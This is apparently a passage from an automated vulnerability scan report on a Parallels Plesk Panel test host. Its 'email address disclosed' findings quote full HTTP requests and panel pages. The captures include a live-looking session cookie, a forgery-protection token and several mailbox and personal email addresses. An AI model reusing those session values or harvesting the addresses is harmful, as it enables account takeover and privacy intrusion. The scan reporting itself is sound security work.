data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":6,"totalItemCount":6,"firstItemNumber":1,"lastItemNumber":6},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"2","name":"fdf080d9224fd0d18957a62c","domainName":"vulnerable.host.fqdn","domainId":"1","userId":"4","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=fdf080d9224fd0d18957a62c@vulnerable.host.fqdn"},{"id":"5","name":"fdf080d9fb033e482a9703a6","domainName":"vulnerable.host.fqdn","domainId":"1","userId":null,"userContactName":null,"aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=fdf080d9fb033e482a9703a6@vulnerable.host.fqdn"},{"id":"1","name":"format-1","domainName":"vulnerable.host.fqdn","domainId":"1","userId":"3","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-1@nosedivesailing.com"},{"id":"3","name":"format-1fdf080d9644e588dffa16265","domainName":"nosedivesailing.com","domainId":"1","userId":"5","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-1fdf080d9644e588dffa16265@nosedivesailing.com"},{"id":"4","name":"format-2","domainName":"vulnerable.host.fqdn","domainId":"1","userId":null,"userContactName":null,"aliases":["3458p93245vrt53@vulnerable.host.fqdn","dfgjhfgjuytuntru@vulnerable.host.fqdn","hgkhjlkppppp@nosedivesailing.com","hrsegjoj@nosedivesailing.com"],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-2@nosedivesailing.com"},{"id":"6","name":"format-2fdf080d97a35d24ced0544fc","domainName":"nosedivesailing.com","domainId":"1","userId":null,"userContactName":null,"aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-2fdf080d97a35d24ced0544fc@nosedivesailing.com"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/email-address/list-data',
disabledSelectHint: '[[disabledSelectHint]]',
searchFilters: {"name":{"type":"text","fields":[],"options":null,"title":"E-mail address","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'E-mail address',
sortable: true,
dataIndex: 'name',
renderer: function(item) {
var aliases = '';
if (0 < item.aliases.length) {
aliases = ' <span class="minor">(' + item.aliases.join('; ') + ')</span>';
}
return '<a href="' + Jsw.baseUrl + '/email-address/edit/id/' + item.id + '">'
+ item.name.escapeHTML() + '@' + item.domainName.escapeHTML() + '</a>' + aliases;
}
}, {
header: '',
cls: 'minor',
renderer: function(item) {
var ret = [];
if (0 < item.redirects.length) {
var message = 1 == item.redirects.length
? '%%firstAddress%%' : '%%firstAddress%% (and %%countLeft%% more)';
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-redirect-on_16.gif" alt="*"> '
+ message
.replace('%%firstAddress%%', item.redirects[0].escapeHTML())
.replace('%%count%%', item.redirects.length)
.replace('%%countLeft%%', item.redirects.length - 1)
+ '</nobr></div>'
    );
}
if (item.autoresponderEnabled) {
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-autoresponder-on_16.gif" alt="*"> '
+ 'Auto-reply is switched on.' + '</nobr></div>'
);
}
return ret.join('');
}
}, {
header: 'User',
sortable: true,
cls: 'minor',
dataIndex: 'userContactName',
renderer: function(item) {
return item.userId
? '<a href="' +
Jsw.baseUrl +
'/user/' + 'edit' +
'/id/' + item.userId +
'">' + item.userContactName.escapeHTML() + '</a>'
: '';
}
}, {
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {
var content =
'<span>' +
'<span class="tooltipData">' +
'Learn how to set up your e-mail account in a mail client program, such as Microsoft Outlook, Outlook Express, Thunderbird, and Apple Mail.' +
'</span>' +
'<a href="#" onclick="Smb.Views.Emails.showConfiguration(' + item.id + ');">' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/edit-email_16.gif"/>' +
'</a>' +
'</span> ';

if (item.webmailUrl) {
var onclick = Smb.Webmail.urlWrapper(item.webmailUrl) + 'return false;';
content +=
'<span>' +
'<span class="tooltipData">' +
'Open webmail for this e-mail address in a new browser window.' +
'</span>' +
'<a href="#" onclick=\'' + onclick + '\'>' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/webmail-on_16.png"/>' +
'</a>' +
'</span> ';
} else {
   content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif"/> ';
}

return content;
}
}
],
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Create E-mail Address',
description: 'Create a new e-mail address in the system and assign it to a user. To create a business e-mail address not associated with any particular user (like sales@mycompany.com), go to the Mailing Lists tab, and create a mailing list.',
addCls: 'sb-add-mail-account',
href: '/email-address/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Change Settings',
description: 'Switch mail service for the domain on or off, specify how to deal with mail sent to nonexistent users, and select webmail program.',
addCls: 'sb-change-mail-settings',
href: '/email-address/mail-settings'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Remove',
description: 'Remove selected e-mail addresses.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('email-addresses-list').execGroupOperation({
url: '/email-address/delete/?redirect=/email-address/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected e-mail addresses?' }
});
}
}
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/list/

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/list/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:39 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:40 GMT
Connection: close
Content-Length: 19251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Mail - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Flist%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Mail</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"E-mail Addresses","href":"\/email-address\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Mailing Lists","href":"\/mail-list\/list","containerCls":""}] });
});
//]]>
</script>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>
<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Hint({
renderTo: 'main',
hint: 'Create and manage e-mail accounts associated with your domains. For each e-mail account, you can set up a mailbox, a number of additional e-mail addresses that will point to the same mailbox (e-mail aliases), an auto-reply, and mail forwarding to one or several e-mail addresses. You can also set up protection from spam and viruses, if these services are available for your account.' });

new Jsw.List({
id: 'email-addresses-list',
renderTo: 'main',
data: {"pager":{"pageCount":0,"itemCountPerPage":25,"first":1,"current":1,"last":0,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":0,"totalItemCount":0,"firstItemNumber":1,"lastItemNumber":0},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""}},"forceShowSearch":false},"data":[],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/email-address/list-data',
disabledSelectHint: '[[disabledSelectHint]]',
searchFilters: {"name":{"type":"text","fields":[],"options":null,"title":"E-mail address","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'E-mail address',
sortable: true,
dataIndex: 'name',
renderer: function(item) {
var aliases = '';
if (0 < item.aliases.length) {
aliases = ' <span class="minor">(' + item.aliases.join('; ') + ')</span>';
}
return '<a href="' + Jsw.baseUrl + '/email-address/edit/id/' + item.id + '">'
+ item.name.escapeHTML() + '@' + item.domainName.escapeHTML() + '</a>' + aliases;
}
}, {
header: '',
cls: 'minor',
renderer: function(item) {
var ret = [];
if (0 < item.redirects.length) {
var message = 1 == item.redirects.length
? '%%firstAddress%%' : '%%firstAddress%% (and %%countLeft%% more)';
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-redirect-on_16.gif" alt="*"> '
+ message
.replace('%%firstAddress%%', item.redirects[0].escapeHTML())
.replace('%%count%%', item.redirects.length)
.replace('%%countLeft%%', item.redirects.length - 1)
+ '</nobr></div>'
    );
}
if (item.autoresponderEnabled) {
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-autoresponder-on_16.gif" alt="*"> '
+ 'Auto-reply is switched on.' + '</nobr></div>'
);
}
return ret.join('');
}
}, {
header: 'User',
sortable: true,
cls: 'minor',
dataIndex: 'userContactName',
renderer: function(item) {
return item.userId
? '<a href="' +
Jsw.baseUrl +
'/user/' + 'edit' +
'/id/' + item.userId +
'">' + item.userContactName.escapeHTML() + '</a>'
: '';
}
}, {
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {
var content =
'<span>' +
'<span class="tooltipData">' +
'Learn how to set up your e-mail account in a mail client program, such as Microsoft Outlook, Outlook Express, Thunderbird, and Apple Mail.' +
'</span>' +
'<a href="#" onclick="Smb.Views.Emails.showConfiguration(' + item.id + ');">' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/edit-email_16.gif"/>' +
'</a>' +
'</span> ';

if (item.webmailUrl) {
var onclick = Smb.Webmail.urlWrapper(item.webmailUrl) + 'return false;';
content +=
'<span>' +
'<span class="tooltipData">' +
'Open webmail for this e-mail address in a new browser window.' +
'</span>' +
'<a href="#" onclick=\'' + onclick + '\'>' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/webmail-on_16.png"/>' +
'</a>' +
'</span> ';
} else {
   content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif"/> ';
}

return content;
}
}
],
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Create E-mail Address',
description: 'Create a new e-mail address in the system and assign it to a user. To create a business e-mail address not associated with any particular user (like sales@mycompany.com), go to the Mailing Lists tab, and create a mailing list.',
addCls: 'sb-add-mail-account',
href: '/email-address/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Change Settings',
description: 'Switch mail service for the domain on or off, specify how to deal with mail sent to nonexistent users, and select webmail program.',
addCls: 'sb-change-mail-settings',
href: '/email-address/mail-settings'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Remove',
description: 'Remove selected e-mail addresses.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('email-addresses-list').execGroupOperation({
url: '/email-address/delete/?redirect=/email-address/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected e-mail addresses?' }
});
}
}
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
